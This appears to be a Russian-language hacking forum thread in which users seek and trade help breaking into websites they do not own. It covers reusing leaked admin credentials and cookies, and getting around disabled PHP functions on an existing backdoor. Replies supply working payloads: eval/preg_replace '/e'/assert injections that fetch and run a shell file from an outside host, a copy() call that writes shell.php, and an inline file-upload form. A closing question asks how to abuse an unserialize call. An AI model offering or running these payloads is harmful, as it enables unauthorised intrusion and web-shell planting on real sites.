Нарыл на сайте спрятанный пхпинфо, а в нем пасс и логин админа, только админ залогинен круглосуточно, а сайт не позволяет залогиниться с разных ип одному юзеру. Как это можно обойти?
Как в том анекдоте про говорящую корову: "Че смотришь? Я сама охуела". НО, как я уже сказал, залогиниться под ним не могу. Там-же, кстати еще и куки прописаны, но подставлять пока не пробовал, к тому-же не понятно, админские они или нет, и не залочит-ли их сервер с другого ип, как лочит авторизацию... Помогите советом
Подскажите, это: passhash=md5(concat(salt,concat(" . sqlesc($password) . ",salt))) означает md5(md5(salt.pass.salt)) или md5(md5(salt.md5(pass).salt)) Или нет?
короче имеем бэкдор,заходил раньше через ?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3NpdGUucnUvc2hlbGwudHh0JykpOw)); (код base64 изменил),саты переехали на другой серв,сейчас быкдор так же есть ,проверял через ?e=phpinfo(); ,но уже в шел не попадаю(так каак стоит disable_functions PHP: eval, exec, system, passthru, scandir, popen, shell_exec, proc_open, proc_close, proc_nice, get_current_user, getmyuid, posix_getpwuid, apache_get_modules, virtual, posix_getgrgid, getmyinode, fileowner, filegroup, getmypid, apache_get_version, apache_getenv, apache_note, apache_setenv, disk_free_space, diskfreespace, dl, ini_restore, openlog, syslog, highlight_file, show_source, symlink, disk_total_space, ini_get_all, get_current_user, posix_uname тоесть eval отключён( как теперь можно попасть в шел)
Попробуй так: ?e=preg_replace("/.*/e","phpinfo();","."); P.S: Как такавой функция preg_*(); может полностью вам заменить eval(); вам остается только синтаксис разобрать!
выдало Hacking attempt! а на другом бэкдоре выдало phpinfo а вот ?e=preg_replace("/.*/e","file_get_contents('http://site.ru/2.txt');","."); не обработало ни на одном(
Я тебе открою страшную хакерскую тайну, только никому не говори! Админ там мудак. Таким образом eval не отключается, тоесть ей пофиг эта директива, а почему так, можно будет узнать если кушать манную кашу и читать хоть что то по теме, а не давать советы (постоянно не в тему, прошу заметить ))).
ага и такое бывает http://forums.devshed.com/php-development-5/phpinfo-shows-my-password-246249.html ты же залогинен на сайте именно под этим логин пассом так ? или там вместо пасса хеш сумма. P.S или это кривость рук админа с настройками вебпанелей, в любом случае такого не должно быть и это не правильно.
В общем все было несколько иначе, просто я, когда писал, решил упростить. Я прочитал скрипт memcache.php, в котором были логин и пасс в явном виде, потом запустил его, скрипт затребовал авторизацию, я ввел данные и просмотрел предложенные данные, ничего интересного не нашел, открыл индекс, он показал мне, что я не сервере НЕ ЗАЛОГИНЕН, т.е. авторизация к memcache.php происходит в обход базы данных (тупо сравниваются введенные данные со строкой в скрипте). После этого я открыл пхп инфо, согласен, скорее всего куки, логин и пасс перешли туда из моей сессии. Попозже проведу более чистый эксперимент. Куда копать понял. Но что мне делать с этим админом, который постоянно залогинен, ведь я даже не знаю, совпадает-ли этот пароль с паролем от сайта....
Что за люди ленивые пошли я в ах**у,ты пока флудил тут уже решение нашел бы.У тебя ограничения мизерные вариантов море как залиться. Исполнял аплоадеры который запросто залазят а get-запрос,тебе выше сказали юзай preg_replace если не получается ей исполнить код читай ман по ней,юзай вместо eval функцию assert
через preg_replace шел не заливается так как фильтруются кавычки,пробывал preg_replace("/.*/e","copy('http://site.ru/1.txt','shell.php');","."); ,проверял на другом всё норм,assert тоже не сработало(может не правильно составил запрос( print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form></form> тоже не помогло(
Code: фильтруются кавычки,пробывал А preg_replace(base64_decode('')); религия не позволяет? Че там у тебя может не получиться? assert(file_get_contents('http://site/shell.txt'));
$terms = $input->request->get('highlight', null, 'base64'); $terms = $terms ? unserialize(base64_decode($terms)) : null; как можно использовать в "своих" целях? файл highlight.php